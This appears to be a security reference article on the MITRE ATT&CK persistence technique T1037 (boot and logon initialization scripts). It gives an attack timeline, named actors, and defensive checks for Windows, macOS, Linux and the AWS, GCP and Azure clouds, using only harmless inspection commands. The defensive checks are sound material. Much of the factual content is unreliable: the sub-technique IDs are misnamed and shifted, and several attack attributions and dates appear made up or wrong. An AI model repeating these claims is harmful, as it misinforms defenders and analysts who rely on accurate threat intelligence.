Boot or Logon Initialization Scripts (T1037)
MITRE ATT&CK Framework Overview (T1037)
The MITRE ATT&CK framework is a comprehensive knowledge base of adversary tactics and techniques based on real-world observations. The "Boot or Logon Initialization Scripts" technique falls under Persistence, involving scripts that run during system boot or user logon to maintain access upon reboots or logins.
Technical History and Notable Attacks
Overview
Boot or Logon Initialization Scripts have long been used for persistence by both sophisticated APT groups and cybercriminals. These scripts run automatically during system boot or user logon, enabling adversaries to execute code without direct interaction.
Key Elements
Tactic: Persistence
Technique ID: T1037
Sub-techniques:
T1037.001: Logon Script (Windows)
T1037.002: Network Logon Script
T1037.003: RC Scripts
T1037.004: Startup Items (Mac)
T1037.005: Startup Items (Linux)
Timelines and Notable Cases
2010s
2012 - Flame malware
Details: Used Windows logon scripts for persistence. Targeted Middle Eastern countries.
Actors: Suspected state-sponsored.
Impact: Espionage and data exfiltration.
2014 - Power Worm
Details: PowerShell scripts during logon for multi-stage payloads, lateral movement, persistence.
Actors: Cybercriminal groups.
Impact: Data exfiltration, ransomware.
2017 - APT28 (Fancy Bear)
Details: Placed scripts in network logon scripts for enterprise environments.
Actors: APT28 (Russian GRU).
Impact: Political espionage, cyber attacks.
2020s
2020 - FIN7
Details: Used Windows logon scripts for malware delivery. Targeted hospitality and retail.
Actors: FIN7.
Impact: Financial theft, credit card breaches.
2021 - SolarWinds Supply Chain Attack
Details: Modified Windows logon scripts for persistence in enterprise environments.
Actors: Suspected state-sponsored (APT29/Nobelium).
Impact: Widespread impact across sectors, including U.S. federal agencies.
Groups and Tools
APT28 (Fancy Bear): Used logon scripts in espionage campaigns.
APT29 (Cozy Bear): Utilized in campaigns like SolarWinds attack.
FIN7: Integrated logon scripts into malware arsenal.
TrickBot: Evolved to use PowerShell logon scripts for persistence.
People of Interest
Pyotr Levashov: Allegedly linked to the Kelihos botnet, using logon scripts for persistence.
Maxim Yakubets: Involved with Dridex and TrickBot, using logon scripts.
1. Windows Environment
Identify Unauthorized Scripts:
Use `Autoruns` utility from Sysinternals to identify unauthorized scripts at boot or login:
Download Autoruns from here.
Run the executable and review entries under the Logon tab.Investigate unknown entries and remove if confirmed malicious.
Group Policy Configuration:
Open `Group Policy Management Console` (GPMC).
Navigate to `User Configuration -> Administrative Templates -> System -> Scripts`.
Define and enforce permitted scripts for startup, shutdown, logon, and logoff.
Monitoring with Windows Event Logs:
Enable and review Event IDs 7045 and 6013 using Event Viewer:
Navigate to 'Event Viewer -> Windows Logs -> System' and filter by the above Event IDs.
2. macOS
Check for Unauthorized Startup Items:
List all login items and LaunchAgents/LaunchDaemons:
ls /Library/LaunchDaemons
ls /Library/LaunchAgents
ls ~/Library/LaunchAgentsInvestigate and remove suspicious items.
Review User Login Items:
Open `System Preferences -> Users & Groups -> Login Items`.
Remove suspicious or unauthorized login items.
Configure System Integrity Protection (SIP):
Ensure SIP is enabled:
csrutil status
3. Linux
Identify Startup Scripts:
Inspect various init directories for unauthorized scripts:
ls /etc/init.d/
ls /etc/rc*.d/Check user crontab and system-wide cron jobs for unknown entries:
crontab -l
cat /etc/crontabInvestigate and remove unauthorized scripts.
SystemD Services:
List active services and review custom service files for unauthorized scripts:
systemctl list-units --type=service
find /etc/systemd/system/ /lib/systemd/system/ -name '*.service'
Audit User Profiles:
Review `.bashrc`, `.bash_profile`, and other shell initialization files for unauthorized commands:
cat ~/.bashrc
cat ~/.bash_profile
4. Amazon AWS
Review EC2 User Data Scripts:
Check and audit startup scripts in User Data for EC2 instances:
Navigate to the EC2 instance in AWS Console.
Check 'View/Change User Data’ in instance settings.
CloudWatch Logs Monitoring:
Set up CloudWatch to monitor logs for unauthorized script executions:
Create a CloudWatch log group for instance logs.
Configure CloudWatch Alarms for suspicious activity.
IAM Policy Enforcement:
Enforce strict IAM policies to ensure only authorized users can modify boot scripts and configurations:
Check IAM policies for EC2 and restrict permissions as necessary.
5. Google Cloud Platform (GCP)
Instance Metadata Scripts:
Audit and review startup scripts in instance metadata:
gcloud compute instances describe [INSTANCE_NAME] --zone [ZONE]
Check the 'metadata' section for any startup script configurations.
Logging and Monitoring:
Enable Stackdriver Logging to log and alert on unauthorized script executions:
Navigate to 'Logging' in GCP Console.
Set up metrics for startup scripts and create alerts for anomalies.
IAM Roles and Permissions:
Restrict permissions using IAM to control access to metadata and startup script configurations:
Review IAM roles and apply the least privilege principle to IAM policies affecting instance metadata.
6. Microsoft Azure
Virtual Machine Extensions:
Check for any custom script or VM extensions that may introduce unauthorized scripts:
Navigate to 'Virtual Machines' in Azure Portal.
Check installed extensions under ‘Settings -> Extensions + applications’.
Azure Monitor Alerts:
Leverage Azure Monitor to set up alerts for suspicious activities or modifications to startup scripts:
Create a Log Analytics workspace.
Set up alerts for logs indicating changes to startup or initialization scripts.
Network Security Groups (NSG):
Use NSGs to restrict access and ensure only authorized entities can modify VM settings/scripts:
Review and update NSG rules to limit access to management ports.
